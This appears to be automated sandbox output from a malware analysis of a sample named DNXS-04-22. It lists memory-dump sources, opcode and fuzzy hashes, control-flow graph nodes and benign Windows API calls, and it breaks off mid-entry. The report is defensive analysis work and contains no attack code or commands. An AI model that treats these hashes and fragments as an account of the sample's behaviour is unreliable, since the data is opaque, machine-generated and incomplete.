                                                                • Opcode ID: f7e013f3225ecb42938e2027379882f0eb681330d200a514f80fa06bfa87b0be
                                                                • Instruction ID: 81a86e9e7187634b9f0f81621d7c4cb938218ec1d850218938fa4a48ef87ecd5
                                                                • Opcode Fuzzy Hash: f7e013f3225ecb42938e2027379882f0eb681330d200a514f80fa06bfa87b0be
                                                                • Instruction Fuzzy Hash: E2127B78A002198FDB14DF69C854BAEBBB6BFC8304F24856DE50ADB395EB34D941CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42e39ebd96014a22de22067afb71354c9db8098008db09870b235275e9431c5f
                                                                • Instruction ID: 20a7ec1554856a0d5bf3224ebf86cb41a42bb689050d20f525ad17a41612170d
                                                                • Opcode Fuzzy Hash: 42e39ebd96014a22de22067afb71354c9db8098008db09870b235275e9431c5f
                                                                • Instruction Fuzzy Hash: 44E1E879A04658CFDB14CFA9C985A9DBBB1FF58318F2580A9E809EB361D730E941CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 178e7d7d923207d5dcd3d03139b958cd8f65124f8c2cfb8483d9f876dcc2db51
                                                                • Instruction ID: d84f513662ee4d1ef5c401a692c6176862c36055772bdf0767ca9e17376523eb
                                                                • Opcode Fuzzy Hash: 178e7d7d923207d5dcd3d03139b958cd8f65124f8c2cfb8483d9f876dcc2db51
                                                                • Instruction Fuzzy Hash: CAD11D7DA00129DFDB14CFA9D984AADBBFAFF88304F658069E405EB261E730D951CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 623f917e0a99663fc466478472b77e9692d3158927716d03bc1ef0cb6192ce34
                                                                • Instruction ID: e79eabedfdbddded5a8fa8ee3fc90bb67b1743ee1cd33e970008e1a7cad26ab0
                                                                • Opcode Fuzzy Hash: 623f917e0a99663fc466478472b77e9692d3158927716d03bc1ef0cb6192ce34
                                                                • Instruction Fuzzy Hash: CCC1A078E00218CFDB54DFA9D994BADBBB2FF89300F1081A9D809AB355DB355A85CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 46fce0737467a965809b97d5286b0efeccfe752e53bf08aae10fb8f8082a0dbf
                                                                • Instruction ID: ed08c0cac9abf2f1fd91ddb1bca35b451e96c967fc02d1c2fbbf246093f27d2e
                                                                • Opcode Fuzzy Hash: 46fce0737467a965809b97d5286b0efeccfe752e53bf08aae10fb8f8082a0dbf
                                                                • Instruction Fuzzy Hash: 15C1B178E00218CFDB54DFA9D994BADBBB2FF89301F1080A9D819AB355DB355A81CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 17a8d8b851c5afae86254fc897c78bbfb81782efa28dca828eefcb6d9a235bb0
                                                                • Instruction ID: 90f7dc45ec11eb9d4fe9fa0b83c251840e714f486499e3ce1b6bd210a4d97a6a
                                                                • Opcode Fuzzy Hash: 17a8d8b851c5afae86254fc897c78bbfb81782efa28dca828eefcb6d9a235bb0
                                                                • Instruction Fuzzy Hash: 44A10874D00218CFEB24DFA9C444B9DBBB1FF89314F208269E419AB391DB749A85CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a87853a769f926d4ca5155c803f64cb68099c562182452dd5fc57d7e6b133c2
                                                                • Instruction ID: a4a67a3484a309d52f546504a039ddc46dde881f6a193c88c243a280da6c98e0
                                                                • Opcode Fuzzy Hash: 6a87853a769f926d4ca5155c803f64cb68099c562182452dd5fc57d7e6b133c2
                                                                • Instruction Fuzzy Hash: 0391E574D00218CFEB54DFA9C444B9CBBB1FF49310F208259E429AB292DB759A85CF55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fbe659080366f269b71a6f5482e5acf0e0f8d9044b2817a5544293755efc12cf
                                                                • Instruction ID: 2ca1b04c393b0abf0a45b77da5e6266d0bb3889ce41c60e86d02598998b0b7c1
                                                                • Opcode Fuzzy Hash: fbe659080366f269b71a6f5482e5acf0e0f8d9044b2817a5544293755efc12cf
                                                                • Instruction Fuzzy Hash: 398193B8E00218CFDB14DFA9D984A9DBBF2BF88305F24806AE409EB355DB349945CF11
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 58c15e06c889fa3c3efb49341ee0a3331ae3eb87b373470e75a60e77f754f029
                                                                • Instruction ID: 6d35e036e56849000549e3e2d01e7208082052e2dcf86b03d583598ebcac78eb
                                                                • Opcode Fuzzy Hash: 58c15e06c889fa3c3efb49341ee0a3331ae3eb87b373470e75a60e77f754f029
                                                                • Instruction Fuzzy Hash: 4F81A7B8D00618CFEB14DFA9D985A9DBBF2BF88314F248069E409EB355DB309942CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7c166f19d2343a1e9a347846aee3e31cfdb53fd9db3455ab4c5e5b719525f80c
                                                                • Instruction ID: 2e05380f67ee5ae462096758214801d15527dc428c1b1ce534e8b6f3a179b4c1
                                                                • Opcode Fuzzy Hash: 7c166f19d2343a1e9a347846aee3e31cfdb53fd9db3455ab4c5e5b719525f80c
                                                                • Instruction Fuzzy Hash: 1E8185B8E00218CFDB14DFA9D984A9DBBB2BF89304F24906AE419EB355DB349945CF11
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1058157d483f64fd095dcb130dbc92c404c61a7de7ef0dc68f431cc44ef5fa3b
                                                                • Instruction ID: 622f6551092921f32a8916dcdbc3376287c84ec3ed46996e6701cb3dcf513fc9
                                                                • Opcode Fuzzy Hash: 1058157d483f64fd095dcb130dbc92c404c61a7de7ef0dc68f431cc44ef5fa3b
                                                                • Instruction Fuzzy Hash: 1281A6B8E00218CFDB14DFA9D984A9DBBF2BF88314F24806AE409EB355DB349945CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cbddbe02413f466f23aee045b2f135e990e33357b6baaa4e5f35f3c3324cc1c0
                                                                • Instruction ID: 35cbe690b2071ef2550a14f0dc2dad1bb7f3e725778d660cc5fc8321cabed9ea
                                                                • Opcode Fuzzy Hash: cbddbe02413f466f23aee045b2f135e990e33357b6baaa4e5f35f3c3324cc1c0
                                                                • Instruction Fuzzy Hash: 7181A5B8D00218CFDB14DFA9D984A9DBBF2BF88304F24906AE409EB355DB349945CF11
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 945a0cce9725d21f07123af700f843f20845ef3c4598511d082b06e902368898
                                                                • Instruction ID: fc1bdad9dd201564fd78b1fd862d533427daadfe00f06b07a41d52a288518fb4
                                                                • Opcode Fuzzy Hash: 945a0cce9725d21f07123af700f843f20845ef3c4598511d082b06e902368898
                                                                • Instruction Fuzzy Hash: 75818778E00218CFEB14DFA9D984A9DBBB2BF88304F24806AD419E7365DB349945CF51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 52bcc56877bd12f0d691b4c53b0722511fed702875c2eaa21ae319f300624297
                                                                • Instruction ID: eeb272bf4f86e984de8ad498f8cd010a813fcbcc4b3f2c8e34d85ff0f5976d7e
                                                                • Opcode Fuzzy Hash: 52bcc56877bd12f0d691b4c53b0722511fed702875c2eaa21ae319f300624297
                                                                • Instruction Fuzzy Hash: EF819778D00218DFEB14DFA9D994B9DBBF2BF88304F248069E419A7355DB349985CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00E24BE6
                                                                • GetCurrentThread.KERNEL32 ref: 00E24C23
                                                                • GetCurrentProcess.KERNEL32 ref: 00E24C60
                                                                • GetCurrentThreadId.KERNEL32 ref: 00E24CB9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID: ,N$,i
                                                                • API String ID: 2063062207-1721297097
                                                                • Opcode ID: 898502e4df60b9aac1e70cba03b16e8287545525e4c118a86702b1f136fd169c
                                                                • Instruction ID: e90a3c83e87c0c69c8a67b9f1f936c79932518e6f2dba1bd921a58226ac329b4
                                                                • Opcode Fuzzy Hash: 898502e4df60b9aac1e70cba03b16e8287545525e4c118a86702b1f136fd169c
                                                                • Instruction Fuzzy Hash: 185164B49013098FEB14DFAAE949B9EBBF1BF88314F208019E409B73A0D7B55944CF65
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1149 e2f74d-e2f7b6 1150 e2f7c1-e2f7c8 1149->1150 1151 e2f7b8-e2f7be 1149->1151 1152 e2f7d3-e2f80b 1150->1152 1153 e2f7ca-e2f7d0 1150->1153 1151->1150 1154 e2f813-e2f872 CreateWindowExW 1152->1154 1153->1152 1155 e2f874-e2f87a 1154->1155 1156 e2f87b-e2f8b3 1154->1156 1155->1156 1160 e2f8c0 1156->1160 1161 e2f8b5-e2f8b8 1156->1161 1162 e2f8c1 1160->1162 1161->1160 1162->1162
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E2F862
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 9119b1ab9abc5f1f419773a452c38a7c072e52811f267b88a699092c2806d1a4
                                                                • Instruction ID: 801669bec921de16b0cc7e9f090cbb3ceffca2081baefc8e1722669553474870
                                                                • Opcode Fuzzy Hash: 9119b1ab9abc5f1f419773a452c38a7c072e52811f267b88a699092c2806d1a4
                                                                • Instruction Fuzzy Hash: DC51C1B5D00359DFDB18CFA9D884ADEFBB5BF48314F24812AE419AB250D7719845CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1163 e2f750-e2f7b6 1164 e2f7c1-e2f7c8 1163->1164 1165 e2f7b8-e2f7be 1163->1165 1166 e2f7d3-e2f872 CreateWindowExW 1164->1166 1167 e2f7ca-e2f7d0 1164->1167 1165->1164 1169 e2f874-e2f87a 1166->1169 1170 e2f87b-e2f8b3 1166->1170 1167->1166 1169->1170 1174 e2f8c0 1170->1174 1175 e2f8b5-e2f8b8 1170->1175 1176 e2f8c1 1174->1176 1175->1174 1176->1176
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E2F862
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 2353c61c5f65aca3ba348d6520245ea1a9b4942d4f43c61491b012d021861e0d
                                                                • Instruction ID: 51de60bc18cbc0e2071929db0bcf0f6f846e50756d2dd81c8a8ea43ff98b5147
                                                                • Opcode Fuzzy Hash: 2353c61c5f65aca3ba348d6520245ea1a9b4942d4f43c61491b012d021861e0d
                                                                • Instruction Fuzzy Hash: B841CFB1D003599FDB18CF9AD884ADEFBB5BF48314F24812AE818AB210D7719845CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1177 677bfc4-677bfc7 1178 677bf79-677bf86 1177->1178 1179 677bfc9-677bffa 1177->1179 1184 677bf8f-677bf90 1178->1184 1185 677bf88 1178->1185 1188 677bfff-677c00d 1179->1188 1184->1188 1185->1184 1187 677bf43-677bf55 1185->1187 1189 677bf57 1187->1189 1190 677bf5e-677bf5f 1187->1190 1202 677c015-677c019 1188->1202 1189->1184 1189->1187 1189->1190 1192 677be86-677bea6 1189->1192 1193 677bef3-677bf00 1189->1193 1194 677bf02-677bf18 1189->1194 1195 677bf3d-677bf3e 1189->1195 1196 677beba-677bed0 1189->1196 1197 677be79-677be7f LdrInitializeThunk 1189->1197 1198 677bea8-677beb5 1189->1198 1190->1188 1192->1196 1192->1198 1193->1195 1200 677bf1f-677bf2c 1194->1200 1201 677bf1a 1194->1201 1195->1202 1203 677bed7-677bef1 1196->1203 1204 677bed2 1196->1204 1197->1192 1198->1195 1205 677bf33-677bf3b 1200->1205 1206 677bf2e 1200->1206 1201->1200 1207 677c021-677c02b 1202->1207 1208 677c01b-677c020 1202->1208 1203->1193 1203->1194 1204->1203 1205->1195 1206->1205 1208->1207
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fcaa5f5a6a137f1f6acb586d9819cfba2bab9ee6a8573d047dd8f4c4d9506b0d
                                                                • Instruction ID: efd5d1df7f6136ddf5833ef77d2dee3fba5620dee56d58f06f95841372d7a975
                                                                • Opcode Fuzzy Hash: fcaa5f5a6a137f1f6acb586d9819cfba2bab9ee6a8573d047dd8f4c4d9506b0d
                                                                • Instruction Fuzzy Hash: 0B4124B8E04208DFDF54DF98D484AEDFBB2BF48714F648159E419AB281C731A986CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1210 677bf64-677bf6e 1211 677bf70-677bf78 1210->1211 1212 677bf7a-677bf7d 1210->1212 1213 677bf80-677bf86 1211->1213 1212->1213 1214 677bf8f-677bf90 1213->1214 1215 677bf88 1213->1215 1217 677bfff-677c00d 1214->1217 1215->1214 1216 677bf43-677bf55 1215->1216 1218 677bf57 1216->1218 1219 677bf5e-677bf5f 1216->1219 1230 677c015-677c019 1217->1230 1218->1214 1218->1216 1218->1219 1221 677be86-677bea6 1218->1221 1222 677bef3-677bf00 1218->1222 1223 677bf02-677bf18 1218->1223 1224 677bf3d-677bf3e 1218->1224 1225 677beba-677bed0 1218->1225 1226 677be79-677be7f LdrInitializeThunk 1218->1226 1227 677bea8-677beb5 1218->1227 1219->1217 1221->1225 1221->1227 1222->1224 1228 677bf1f-677bf2c 1223->1228 1229 677bf1a 1223->1229 1224->1230 1231 677bed7-677bef1 1225->1231 1232 677bed2 1225->1232 1226->1221 1227->1224 1233 677bf33-677bf3b 1228->1233 1234 677bf2e 1228->1234 1229->1228 1235 677c021-677c02b 1230->1235 1236 677c01b-677c020 1230->1236 1231->1222 1231->1223 1232->1231 1233->1224 1234->1233 1236->1235
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c9cb4b7d70eec4df8fd74ef563544357cda3c47d822bb1952495c4609c624ec2
                                                                • Instruction ID: 2733905c094036e3a333f37764a5dad37ecc25086c5f04f6ea13ae534d78ff89
                                                                • Opcode Fuzzy Hash: c9cb4b7d70eec4df8fd74ef563544357cda3c47d822bb1952495c4609c624ec2
                                                                • Instruction Fuzzy Hash: 4A4112B8E04208CFDF54CF98D584AEDBBB2FF48714F248159E409AB291C731A986CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1258 f51bf0-f51c2c 1259 f51c32-f51c37 1258->1259 1260 f51cdc-f51cfc 1258->1260 1261 f51c39-f51c70 1259->1261 1262 f51c8a-f51cc2 CallWindowProcW 1259->1262 1266 f51cff-f51d0c 1260->1266 1269 f51c72-f51c78 1261->1269 1270 f51c79-f51c88 1261->1270 1263 f51cc4-f51cca 1262->1263 1264 f51ccb-f51cda 1262->1264 1263->1264 1264->1266 1269->1270 1270->1266
                                                                APIs
                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 00F51CB1
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786080895.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_f50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: CallProcWindow
                                                                • String ID:
                                                                • API String ID: 2714655100-0
                                                                • Opcode ID: d5844ddadc21c032402de2d91c53763e8790e41ed6de93334750f6b7ff940370
                                                                • Instruction ID: bac26c1a20d9a80c23c717257a6c3e58b09c237598fd56ede26a25595f2c4cb8
                                                                • Opcode Fuzzy Hash: d5844ddadc21c032402de2d91c53763e8790e41ed6de93334750f6b7ff940370
                                                                • Instruction Fuzzy Hash: AF4127B5900349CFDB14CF99C488BAABBF5FB88314F248459D919AB321D775A845CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1272 f53328-f53349 1274 f5331d-f5331f 1272->1274 1275 f5334b-f53370 1272->1275 1277 f54138-f5419a OleInitialize 1274->1277 1278 f541a3-f541c0 1277->1278 1279 f5419c-f541a2 1277->1279 1279->1278
                                                                APIs
                                                                • OleInitialize.OLE32(00000000), ref: 00F5418D
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3786080895.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_f50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: 0d0ddfe5866303663004368d6aa8d1d7889e7ae04fdf76cfa75323bdd636a1e8
                                                                • Instruction ID: 4bea90e846d0bd619548829e6cd0b09998f8f441365798dd2ab742ac73cdad0b
                                                                • Opcode Fuzzy Hash: 0d0ddfe5866303663004368d6aa8d1d7889e7ae04fdf76cfa75323bdd636a1e8
                                                                • Instruction Fuzzy Hash: 7B21FF718093988FEB11CFADC8457DABFF0EF46320F14408BC544E7242C6349589CBA2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1282 677be18-677be4e 1284 677be55-677be7f LdrInitializeThunk 1282->1284 1285 677be50 1282->1285 1287 677be86-677bea6 1284->1287 1285->1284 1288 677beba-677bed0 1287->1288 1289 677bea8-677beb5 1287->1289 1291 677bed7-677bef1 1288->1291 1292 677bed2 1288->1292 1290 677bf3d-677c019 1289->1290 1298 677c021-677c02b 1290->1298 1299 677c01b-677c020 1290->1299 1294 677bef3-677bf00 1291->1294 1295 677bf02-677bf18 1291->1295 1292->1291 1294->1290 1296 677bf1f-677bf2c 1295->1296 1297 677bf1a 1295->1297 1300 677bf33-677bf3b 1296->1300 1301 677bf2e 1296->1301 1297->1296 1299->1298 1300->1290 1301->1300
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 23a5a88305ff68b991aa2b341f776803be13729da9154c9dc8c95e0b19373d19
                                                                • Instruction ID: 8ed6bc33cee01009edfee4dcf6aed8fb6d7ccbbf585c3ed0b5d3a2d93b14677a
                                                                • Opcode Fuzzy Hash: 23a5a88305ff68b991aa2b341f776803be13729da9154c9dc8c95e0b19373d19
                                                                • Instruction Fuzzy Hash: 85215CB1D052089BDB14DFAAD884BDEFBF6EF89310F24912AD514B7390D7705986CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1308 6778d94 1309 6778e53-6778e64 1308->1309 1310 6778e66 1309->1310 1311 6778e6b-6778e74 1309->1311 1310->1311 1313 6778c4b-6778c70 1311->1313 1314 6778e7a-6778e8d 1311->1314 1317 6778c77-6778cae 1313->1317 1318 6778c72 1313->1318 1315 6778e94-6778eaf 1314->1315 1316 6778e8f 1314->1316 1319 6778eb6-6778eca 1315->1319 1320 6778eb1 1315->1320 1316->1315 1327 6778cb5-6778ce7 1317->1327 1328 6778cb0 1317->1328 1318->1317 1323 6778ed1-6778ee7 LdrInitializeThunk 1319->1323 1324 6778ecc 1319->1324 1320->1319 1326 6778ee9-6778fe6 1323->1326 1324->1323 1330 6778fee-6778ff8 1326->1330 1331 6778fe8-6778fed 1326->1331 1333 6778d4b-6778d5e 1327->1333 1334 6778ce9-6778d0e 1327->1334 1328->1327 1331->1330 1335 6778d65-6778d8a 1333->1335 1336 6778d60 1333->1336 1338 6778d15-6778d43 1334->1338 1339 6778d10 1334->1339 1342 6778d8c-6778d8d 1335->1342 1343 6778d99-6778dd1 1335->1343 1336->1335 1338->1333 1339->1338 1342->1314 1344 6778dd3 1343->1344 1345 6778dd8-6778e39 call 6778790 1343->1345 1344->1345 1351 6778e40-6778e52 1345->1351 1352 6778e3b 1345->1352 1351->1309 1352->1351
                                                                APIs
                                                                • LdrInitializeThunk.NTDLL(00000000), ref: 06778ED6
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e80dfa2146ec3035f050d0e2e91f2be7d91c1282f997e7e606a53aa9b1f00e5e
                                                                • Instruction ID: ff0ddd6e4036cccb92ee300a2382a6a85dd7a8c812b8301f5b074637b3cf5eca
                                                                • Opcode Fuzzy Hash: e80dfa2146ec3035f050d0e2e91f2be7d91c1282f997e7e606a53aa9b1f00e5e
                                                                • Instruction Fuzzy Hash: 2B113A74E002198FEF54DBA8D888AADB7F5FB88314F148265E858E7341D771EC41CB62
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1303 e24db0-e24e44 DuplicateHandle 1304 e24e46-e24e4c 1303->1304 1305 e24e4d-e24e6a 1303->1305 1304->1305
                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E24E37
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 3d7a770138a7c100c7e9ac0dcb7a6702771f56ea115348aede2476a320dcc125
                                                                • Instruction ID: fd9efff393bdab9254ad72d28a0d6d8a8eb397fac168ebcc54cb884e990a5492
                                                                • Opcode Fuzzy Hash: 3d7a770138a7c100c7e9ac0dcb7a6702771f56ea115348aede2476a320dcc125
                                                                • Instruction Fuzzy Hash: 5221E4B59003599FDB10CFAAD884ADEBBF9FB48310F14841AE914A7350C374A940CF64
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1354 e2c148-e2d600 1356 e2d602-e2d605 1354->1356 1357 e2d608-e2d637 LoadLibraryExW 1354->1357 1356->1357 1358 e2d640-e2d65d 1357->1358 1359 e2d639-e2d63f 1357->1359 1359->1358
                                                                APIs
                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E2D439,00000800,00000000,00000000), ref: 00E2D62A
                                                                Memory Dump Source
